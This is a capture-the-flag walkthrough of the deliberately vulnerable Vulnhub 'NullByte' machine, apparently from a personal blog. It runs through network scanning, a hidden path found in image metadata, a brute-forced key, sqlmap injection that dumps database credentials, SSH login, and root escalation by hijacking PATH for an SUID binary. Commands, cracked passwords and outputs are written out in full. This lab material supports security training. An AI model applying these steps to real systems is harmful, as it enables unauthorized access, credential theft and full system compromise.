INIT
identify target IP
➜ ~ nmap -sP 172.16.129.128/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-13 11:48 EDT
Nmap scan report for Home (172.16.129.1)
Host is up (0.00056s latency).
Nmap scan report for 172.16.129.2
Host is up (0.00033s latency).
Nmap scan report for 172.16.129.128
Host is up (0.0011s latency).
Nmap scan report for 172.16.129.141
Host is up (0.0010s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.35 seconds
edit /etc/hosts
file (local DNS)
# Vulnhub
172.16.129.141 nullbyte.vuln
lets starting …
Scanning
Nmap
➜ ~ sudo nmap -A -p- -T4 nullbyte.vuln
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-13 11:51 EDT
Nmap scan report for nullbyte.vuln (172.16.129.141)
Host is up (0.0014s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34372/tcp6 status
| 100024 1 45260/tcp status
| 100024 1 53470/udp6 status
|_ 100024 1 58576/udp status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
| 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_ 256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
45260/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:72:55:45 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT ADDRESS
1 1.42 ms nullbyte.vuln (172.16.129.141)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.42 seconds
Enumeration
port 80
landing page
Whatweb
➜ ~ sudo whatweb nullbyte.vuln
http://nullbyte.vuln [200 OK] Apache[2.4.10], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[172.16.129.141], Title[Null Byte 00 - level 1]
Check directory
➜ ~ gobuster dir -u http://nullbyte.vuln -w /usr/share/wordlists/dirb/big.txt ===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://nullbyte.vuln
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/13 11:56:52 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 297]
/.htaccess (Status: 403) [Size: 297]
/javascript (Status: 301) [Size: 319] [--> http://nullbyte.vuln/javascript/]
/phpmyadmin (Status: 301) [Size: 319] [--> http://nullbyte.vuln/phpmyadmin/]
/server-status (Status: 403) [Size: 301]
/uploads (Status: 301) [Size: 316] [--> http://nullbyte.vuln/uploads/]
===============================================================
2021/08/13 11:56:57 Finished
===============================================================
This challenge is CTF style …
IMG Metadata
lets check metadata of landing page image
➜ ~ curl http://nullbyte.vuln/main.gif -o img | exiftool img
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 16647 100 16647 0 0 2709k 0 --:--:-- --:--:-- --:--:-- 2709k
ExifTool Version Number : 12.16
File Name : img
Directory : .
File Size : 16 KiB
File Modification Date/Time : 2021:08:13 14:31:44-04:00
File Access Date/Time : 2021:08:13 14:31:44-04:00
File Inode Change Date/Time : 2021:08:13 14:31:44-04:00
File Permissions : rw-r--r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071
this line is interesting
Comment : P-): kzMb5nVYJw
intercept this page
brute forcing the only way
Exploiting
Brute forcing key
go for burp intruder
for payload i will use Seclists SecLists/Passwords/Common-Credentials/10k-most-common.txt
elite is the key
press <enter_key>
only empty input
SQLmap
SQLmap against this input field
# identify DB
➜ ~ sqlmap -u 'http://nullbyte.vuln/kzMb5nVYJw/420search.php?usrtosearch=x' --dbs
. . .
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
. . .# dump data
➜ ~ sqlmap -u 'http://nullbyte.vuln/kzMb5nVYJw/420search.php?usrtosearch=' --batch --dump -C User,Password -T user -D mysqlBB
. . .
+------------------+-------------------------------------------------------+
| User | Password |
+------------------+-------------------------------------------------------+
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
| debian-sys-maint | *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC |
| phpmyadmin | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) |
+------------------+-------------------------------------------------------+
. . .
Remember
we have /phpmyadmin
directory gobuster output
Credentials : root:sunnyvale
phpMyAdmin
dive to Database: seth Table: users
Credentials : ramses
pass is hashed lets crack it :)
YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE
decode base64
c6d6bd7ebf806f43c76acc3681703b81
crack the hash
omega
i used hashes.com for hole process
Credentials : ramses:omega
SSH Connection
now lets connect to machine using SSH port 777
➜ ~ ssh ramses@nullbyte.vuln -p 777
The authenticity of host '[nullbyte.vuln]:777 ([172.16.129.141]:777)' can't be established.
ECDSA key fingerprint is SHA256:H/Y/TKggtnCfMGz457Jy6F6tUZPrvEDD62dP9A3ZIkU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[nullbyte.vuln]:777,[172.16.129.141]:777' (ECDSA) to the list of known hosts.
ramses@nullbyte.vuln's password: The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$
- Regular User Account Access
Privilege Escalation
SUID binary
ramses@NullByte:/var/www/backup$ find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/procmail
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/sbin/exim4
/var/www/backup/procwatch
/bin/su
/bin/mount
/bin/umount
/sbin/mount.nfs
this file looks … interesting :joy: /var/www/backup/procwatch
lets take a look …
ramses@NullByte:/var/www/backup$ ./procwatch
PID TTY TIME CMD
1487 pts/0 00:00:00 procwatch
1488 pts/0 00:00:00 sh
1489 pts/0 00:00:00 ps
this file trigger ps
command lets abuse it
ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:$PATH
ramses@NullByte:/var/www/backup$ touch ps
ramses@NullByte:/var/www/backup$ echo '/bin/sh -i' > ps
ramses@NullByte:/var/www/backup$ chmod 777 ps
ramses@NullByte:/var/www/backup$ ./procwatch
# whoami
root
- Root User Account Access
github page : https://maaelhamid.github.io/posts/NULLBYTE/